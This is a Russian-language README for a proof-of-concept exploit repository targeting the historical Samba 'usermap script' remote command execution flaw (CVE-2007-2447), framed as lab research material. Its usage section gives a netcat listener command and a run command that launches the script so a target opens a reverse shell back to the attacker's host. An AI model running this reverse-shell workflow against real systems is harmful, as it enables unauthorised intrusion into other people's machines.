
Proof-of-concept эксплойт для удаленного выполнения команд через usermap script в Samba (CVE-2007-2447), с возможностью обратной оболочки для контролируемого лабораторного тестирования и исследований в области безопасности.
PoC: Samba "usermap script" удаленное выполнение команд (исторический CVE). Этот репозиторий содержит небольшой концептуальный скрипт для исследовательских и образовательных целей. Основной скрипт — usermap_script_Command_Execution.py.
Ссылка на статью: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Клонируйте репозиторий и запустите скрипт в контролируемой лабораторной среде. PoC опционально использует reverse shell обратно на LHOST:LPORT — запустите ваш слушатель перед запуском скрипта и убедитесь, что зависимости установлены (см. Установка).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Параметры
RHOST — целевой IP или имя хостаRPORT — целевой TCP порт (обычно 139)LHOST — IP слушателя для обратного соединенияLPORT — порт слушателяРекомендуется: создайте изолированное виртуальное окружение Python и установите зависимости из requirements.txt перед запуском скрипта.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Этот код предоставлен только для законных исследований в области безопасности, образования и защитного тестирования. Не запускайте этот скрипт против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения. Неправильное использование может привести к юридическим последствиям; владелец репозитория не несет ответственности за неправильное использование.
Всегда предпочитайте статический анализ кода и контролируемое лабораторное тестирование (снимки ВМ, изолированные сети и захват пакетов) при анализе потенциально опасного кода.
Если вы хотите получить неисполняемый аннотированный пошаговый разбор или requirements.txt, откройте issue или запросите его здесь.